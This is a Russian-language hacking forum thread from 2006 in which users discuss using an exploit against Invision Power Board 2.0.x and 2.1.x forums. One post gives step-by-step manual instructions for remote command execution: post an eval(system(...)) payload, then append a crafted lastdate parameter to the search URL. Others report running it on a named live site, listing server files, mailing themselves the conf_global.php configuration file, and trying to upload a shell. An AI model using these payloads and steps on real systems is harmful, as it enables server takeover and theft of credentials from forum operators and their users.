HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.04.2006, 19:40
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
 

  #2  
Старый 28.04.2006, 19:37
dasNICK
Новичок
Регистрация: 28.02.2006
Сообщений: 21
Провел на форуме:
125991

Репутация: 0
По умолчанию

Цитата:
Сообщение от degeneration x  
на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
А это какой командой если не секрет ?
 

  #3  
Старый 02.05.2006, 15:53
L1on
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629

Репутация: 2
По умолчанию

Цитата:
Сообщение от Go0o$E  
Очень даже хорошо работает exploit! Проверил на lineageii.ru.
Не знаю почему, но на форуме lineageii.ru, у меня не выполняются никакие команды, ни под винду, ни под линукс. Хотя тема создаётся... Если делаю ручками, то тож не пашет.
Кстати часто на форумах сплойт не воспроизводит команды, а ручками всё работает. Может это из-за того что я не правил сплойт...

И ещё: когда я постю сообщение, например
Код:
eval(system(ls)); //'
то при поиске выдаёт файлы, лежащие на сервере, а когда например:
Код:
eval(system(ls -la)); //'
то мне выдаётся:
IPB WARNING [2] system(): Cannot execute a blank command (Line: 1 of /sources/search.php(1236) : regexp code)

Почему так?

Последний раз редактировалось L1on; 02.05.2006 в 16:06..
 

  #4  
Старый 27.04.2006, 16:06
0verfe1
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939

Репутация: -4
По умолчанию

да отлично работает =))) просто не на всех форумах
 

  #5  
Старый 27.04.2006, 16:31
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Описание баги http://www.securityfocus.com/archive.../30/0/threaded
Ручками тоже работает замечательно.
__________________
Full DNS report
 

  #6  
Старый 29.04.2006, 12:01
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Цитата:
Сообщение от Azazel  
Описание баги http://www.securityfocus.com/archive.../30/0/threaded
Ручками тоже работает замечательно.
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.
__________________
Full DNS report
 

  #7  
Старый 03.05.2006, 21:36
L1on
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629

Репутация: 2
По умолчанию

Цитата:
Сообщение от Azazel  
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.

Вставляю в сообщение eval(system(ls)); //' , выдаёт, как и надо, файлы на сервере, делаю eval(system(id)); //', работает, вообще, работают все команды из одного слова. Но когда пробую например ls -la, или which wget, то пишет ошибку. Но тогда и шелл нельзя залить... Что я делаю не так?
 

  #8  
Старый 27.04.2006, 17:46
Carle-On-Line
Новичок
Регистрация: 23.04.2006
Сообщений: 5
Провел на форуме:
47463

Репутация: 0
По умолчанию

Так я не пойму, есть шифровка в сплойте или нет!?
 

  #9  
Старый 27.04.2006, 17:52
limpompo
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

ЕСТЬ! тебе же сказали это в 9 посте

http://forum.antichat.ru/showpost.ph...11&postcount=9
 

  #10  
Старый 27.04.2006, 18:32
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Хм... У меня сплойт пишет
[~] Create new message ... [ FILED ]

На форуме появляется новая тема с мессагой. В сообщении эта самая шифровка из 95 строки.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Эксплоит для Invision Power Board v2.1.3? xdx Уязвимости CMS / форумов 8 08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться? GrisS Уязвимости CMS / форумов 16 02.02.2006 16:00
Вопрос про заливку шелла в Invision Power Board DiNo Уязвимости CMS / форумов 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ